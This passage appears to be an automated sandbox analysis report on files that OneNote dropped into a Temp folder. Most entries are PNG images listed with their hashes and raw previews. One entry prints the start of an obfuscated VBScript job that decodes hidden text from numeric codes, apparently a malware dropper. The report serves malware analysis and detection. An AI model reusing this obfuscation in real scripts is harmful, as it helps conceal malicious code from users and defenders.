                                                                                                                                                                                                          SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                          SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                          SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{794C3F0B-DEA4-4CD7-81C7-B79F7E25513A}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{7A5B1FB9-0024-429A-9327-BE3196199D44}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{7B5045F9-4385-449C-B1D9-3B3C00B3B165}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3879
                                                                                                                                                                                                          Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                          MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                          SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                          SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                          SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{7CB7FD4B-BC4D-4E44-9405-F3EFB03F15EF}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4847
                                                                                                                                                                                                          Entropy (8bit):7.950192613458318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                          MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                          SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                          SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                          SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{7D7C5CFC-7B93-490D-946E-0E24A7401CCA}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (792), with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):55113
                                                                                                                                                                                                          Entropy (8bit):5.216959514455489
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:n9Te2jdcdTeNtu1t/nl8BFWVyeaNhvsbsS:9TVdaeNtuXndH
                                                                                                                                                                                                          MD5:AE25F2104967B2708AC9DBA80AAC52FD
                                                                                                                                                                                                          SHA1:7AC0150B43CBB5EEBA9A0F956E1291DF6790F3BF
                                                                                                                                                                                                          SHA-256:11B3D1564B12934489281250C9A683F076FE10254BFDD7DA72307E538838EC56
                                                                                                                                                                                                          SHA-512:D4A7F95631E7EB88FDADBE66D31BF9C7459D0F80CA2C9174952AAD42BFF6262241B25916E6A089F778990BE981A2CF220BAA69AD261314247C286397553DECCA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<job id="cucuparu">..<script language="VBScript">..fastenedy = fastenedy + ("\ocw40599\ocw39558\ocw37476\ocw34353\ocw38517\ocw40599\ocw38170\ocw40252\ocw21167\ocw17003\ocw4511")..megamouthy = "megamouthy"..girlohy = girlohy + ("sycrwf\ocwfalsetreatedyextenuatingywhomytreatedy")..mendy = "mendy"..waryfishy = mid(girlohy,7,4)..'tegerytegery..elementumy = Split(fastenedy,waryfishy,-1,0)..wonderingy = "wonderingy"..for prepossessedy = 1 to Ubound(elementumy)...jestinglyy = jestinglyy & chr(Clng(elementumy(prepossessedy)) / 347)..Next..'wonderingywonderingy..fastenedy = fastenedy + ("\ocw39905\ocw35047\ocw40252\ocw11104\ocw35394\ocw39905\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw21167\ocw34353\ocw39558\ocw35047\ocw33659\ocw40252\ocw35047\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw13880\ocw11798\ocw39905\ocw34353\ocw39558\ocw36435\ocw38864\ocw40252\ocw36435\ocw38170\ocw35741\ocw15962\ocw35394\ocw36435\ocw37476\ocw35047\ocw39905\ocw41987\ocw39905\ocw40252\ocw35047

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{7E12CD88-9F4A-4CB4-9472-9CAF707992C0}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                          Entropy (8bit):7.837610270261933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                          MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                          SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                          SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                          SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{87226156-A7D9-431A-A54E-DF8263E50BC6}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1570
                                                                                                                                                                                                          Entropy (8bit):7.780157858994452
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                          MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                          SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                          SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                          SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{894D4FC3-3AC7-4FF2-BD59-E1C671A93A5F}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2599
                                                                                                                                                                                                          Entropy (8bit):7.903700862190034
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                          MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                          SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                          SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                          SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{8B3486C4-4E5D-4516-83E8-DEB67F929262}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13241
                                                                                                                                                                                                          Entropy (8bit):7.931391290415517
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                          MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                          SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                          SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                          SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{8B6E3FF9-07E9-439B-B055-D7C46E0F3203}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2599
                                                                                                                                                                                                          Entropy (8bit):7.903700862190034
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                          MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                          SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                          SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                          SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{8C14D7E0-9590-46A1-BE40-B3D46E080FB1}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17289
                                                                                                                                                                                                          Entropy (8bit):7.962998633267186
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                          MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                          SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                          SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                          SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{8C800BE2-C060-4D26-9048-02CE1FE750AE}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1570
                                                                                                                                                                                                          Entropy (8bit):7.780157858994452
                                                                                                                                                                                                          Encrypted:false
